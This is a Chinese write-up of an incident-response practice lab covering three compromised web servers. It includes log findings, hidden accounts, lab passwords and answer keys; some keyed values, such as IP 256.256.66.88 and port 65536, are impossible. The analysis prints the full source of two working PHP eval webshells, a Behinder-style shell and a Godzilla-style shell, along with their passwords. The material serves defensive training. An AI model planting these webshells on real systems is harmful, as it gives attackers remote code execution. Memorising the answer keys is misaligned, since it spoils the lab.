知攻善防应急响应靶场练习-web

web1

前景需要：
小李在值守的过程中，发现有[CPU](https://so.csdn.net/so/search?q=CPU&spm=1001.2101.3001.7020)占用飙升，出于胆子小，就立刻将服务器关机，这是他的服务器系统，请你找出以下内容，并作为通关条件：

1.攻击者的shell密码
2.攻击者的IP地址
3.攻击者的隐藏账户名称
4.攻击者挖矿程序的矿池域名

用户：administrator
密码：Zgsf@admin.com

shell密码

先去查看apache日志

发现后门木马

查看shell.php，md5+aes，默认密码是rebeyond

<?php
@error_reporting(0);
session_start();
    $key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond
 $_SESSION['k']=$key;
 session_write_close();
 $post=file_get_contents("php://input");
if(!extension_loaded('openssl'))
 {
  $t="base64_"."decode";
  $post=$t($post."");

for($i=0;$i<strlen($post);$i++) {
        $post[$i] = $post[$i]^$key[$i+1&15]; 
       }
 }
else
 {
  $post=openssl_decrypt($post, "AES128", $key);
 }
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
class C{publicfunction __invoke($p) {eval($p."");}}
    @call_user_func(new C(),$params);
?>

得到shell密码：rebeyond

攻击者的ip

1	192.168.126.1 - - [26/Feb/2024:22:46:23 +0800] "GET /content/plugins/tips/shell.php HTTP/1.1" 200 -

由日志可的，192.168.126.1

隐藏账户名称

在用户目录下即可看到，hack168$

也可以在注册表中看

矿池域名

这个需要找到恶意文件，然后去查看他的源码

在hacker用户桌面发现一个Kuang.exe,本来就是虚拟机打开的，无所谓，运行看一下，千万别在本机运行

运行之后发现系统直接崩了，cpu拉满了，可以确定这是恶意文件

云沙箱分析不出来矿池域名，但可以确定这个是python编译的exe文件

PyInstaller 提取器：

python pyinstxtractor.py file

https://github.com/extremecoders-re/pyinstxtractor

拿到pyc文件，还需要用在线网站反编译一下

拿到源码

矿池域名：wakuang.zhigongshanfang.top

答案

1.rebeyond
2.192.168.126.1
3.hack168$
4.wakuang.zhigongshanfang.top

web2

前景需要：小李在某单位驻场值守，深夜12点，甲方已经回家了，小李刚偷偷摸鱼后，发现安全设备有告警，于是立刻停掉了机器开始排查。这是他的服务器系统，请你找出以下内容，并作为通关条件：
1.攻击者的IP地址（两个）？
2.攻击者的webshell文件名？
3.攻击者的webshell密码？
4.攻击者的伪QQ号？
5.攻击者的伪服务器IP地址？
6.攻击者的服务器端口？
7.攻击者是如何入侵的（选择题）？
8.攻击者的隐藏用户名？

相关账户密码
用户:administrator
密码:Zgsf@qq.com

IP地址

直接下载D盾扫描一下网站根目录，发现后门木马

直接apache日志中搜索，发现第一个ip，192.168.126.135

然后第二个ip，发现日志中没有，可以看看网站还有哪些注入点

网站是开启ftp服务的，去看他的日志

可以看到攻击者就是打的ftp攻击，但还是没有找到第二个ip

可以借助一个小工具，windows日志快速分析工具，是建立在LogParser的基础上的可视化快捷使用，由GUI界面

发现第二个ip 192.168.126.129

webshell的文件名

由上可得，system.php

webshell的密码

哥斯拉的木马

hack6618

<?php
@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){
    for($i=0;$i<strlen($D);$i++) {
        $c = $K[$i+1&15];
        $D[$i] = $D[$i]^$c;
    }
    return $D;
}
$pass='hack6618'; #密码
$payloadName='payload';
$key='7813d1590d28a7dd';
if (isset($_POST[$pass])){
    $data=encode(base64_decode($_POST[$pass]),$key);
    if (isset($_SESSION[$payloadName])){
        $payload=encode($_SESSION[$payloadName],$key);
        if (strpos($payload,"getBasicsInfo")===false){
            $payload=encode($payload,$key);
        }
		eval($payload);
        echo substr(md5($pass.$key),0,16);
        echo base64_encode(encode(@run($data),$key));
        echo substr(md5($pass.$key),16);
    }else{
        if (strpos($data,"getBasicsInfo")!==false){
            $_SESSION[$payloadName]=encode($data,$key);
        }
    }
}

攻击者的伪qq号

在快速访问中发现frp(内网穿透工具)，可以确定是ftp攻击，同时发现一个类似qq号的东西，这个就是答案

攻击者的伪服务器ip+端口

这个需要去查看frp的ini文件，找到ip和端口

攻击者入侵方式

由上可得，就是ftp攻击

隐藏用户名

老问题了

答案

1.192.168.126.135
192.168.126.129
2.system.php

3.hack6618

4.777888999321

5.256.256.66.88
6.65536
7.ftp攻击

8.hack887$

web3

前景需要：小苕在省护值守中，在灵机一动情况下把设备停掉了，甲方问：为什么要停设备？小苕说：我第六感告诉我，这机器可能被黑了。
这是他的服务器，请你找出以下内容作为通关条件：
1.攻击者的两个IP地址
2.隐藏用户名称
3.黑客遗留下的flag【3个】

用户：administrator
密码：xj@123456